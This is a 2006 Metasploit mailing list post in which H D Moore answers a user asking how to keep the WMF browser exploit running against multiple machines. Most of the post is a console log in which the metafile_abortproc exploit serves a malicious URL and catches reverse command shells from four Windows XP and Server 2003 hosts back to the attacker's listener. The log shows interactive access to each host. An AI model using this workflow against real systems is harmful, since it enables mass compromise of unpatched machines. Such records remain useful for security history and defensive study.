Metasploit mailing list archives

wmf flaws...auto-restart the exploit?


From: hdm at metasploit.com (H D Moore)
Date: Wed, 4 Jan 2006 09:05:53 -0600

This is one of the limitations under Metasploit 2.x, version 3.x supports 
what we call "passive exploits" that allow multiple sessions to be 
generated and handled. This version of msf3 should be released either 
late this week or early next (along with a working version of the WMF 
exploit).

-HD

Example of MSF3 + WMF:

msf exploit(windows/browser/metafile_abortproc) > exploit
[*] Started reverse handler
[*] Using URL: http://192.168.0.100:8080/wee
[*] Server started.
[*] Exploit running as background job.
msf exploit(windows/browser/metafile_abortproc) > 
[*] Sending stage (143 bytes)
[*] Command shell session 1 opened (192.168.0.100:4444 -> 
192.168.0.219:1380)
[*] Sending stage (143 bytes)
[*] Command shell session 2 opened (192.168.0.100:4444 -> 
192.168.0.231:3311)
[*] Sending stage (143 bytes)
[*] Command shell session 3 opened (192.168.0.100:4444 -> 
192.168.0.231:3312)
[*] Sending stage (143 bytes)
[*] Command shell session 4 opened (192.168.0.100:4444 -> 
192.168.0.219:1382)

msf exploit(windows/browser/metafile_abortproc) > session -l

Active sessions
===============

    Id  Description    Tunnel
    --  -----------    ------
    1   Command shell  192.168.0.100:4444 -> 192.168.0.219:1380
    2   Command shell  192.168.0.100:4444 -> 192.168.0.231:3311
    3   Command shell  192.168.0.100:4444 -> 192.168.0.231:3312
    4   Command shell  192.168.0.100:4444 -> 192.168.0.219:1382

msf exploit(windows/browser/metafile_abortproc) > session -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\DDI\Desktop>exit
exit


Abort session 1? [y/N]  y

[*] Command shell session 1 closed.
msf exploit(windows/browser/metafile_abortproc) > session -i 4
[*] Starting interaction with 4...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\DDI\Desktop>exit
exit

Abort session 4? [y/N]  y

[*] Command shell session 4 closed.
msf exploit(windows/browser/metafile_abortproc) > session -i 2
[*] Starting interaction with 2...

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>exit
exit

Abort session 2? [y/N]  y

[*] Command shell session 2 closed.
msf exploit(windows/browser/metafile_abortproc) > session -i 3
[*] Starting interaction with 3...

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>exit
exit
y

Abort session 3? [y/N]  y

[*] Command shell session 3 closed.
msf exploit(windows/browser/metafile_abortproc) > session -l

Active sessions
===============

No active sessions.

msf exploit(windows/browser/metafile_abortproc) >  

On Tuesday 03 January 2006 18:48, Gianluigi "Zane" Zanettini wrote:
The problem is, the exploit quits after sending the payload (I'm using
win32_reverse_stg_upexec): is there any way to automatically restart
the webserver after that and get the exploit ready for another machine?



Current thread: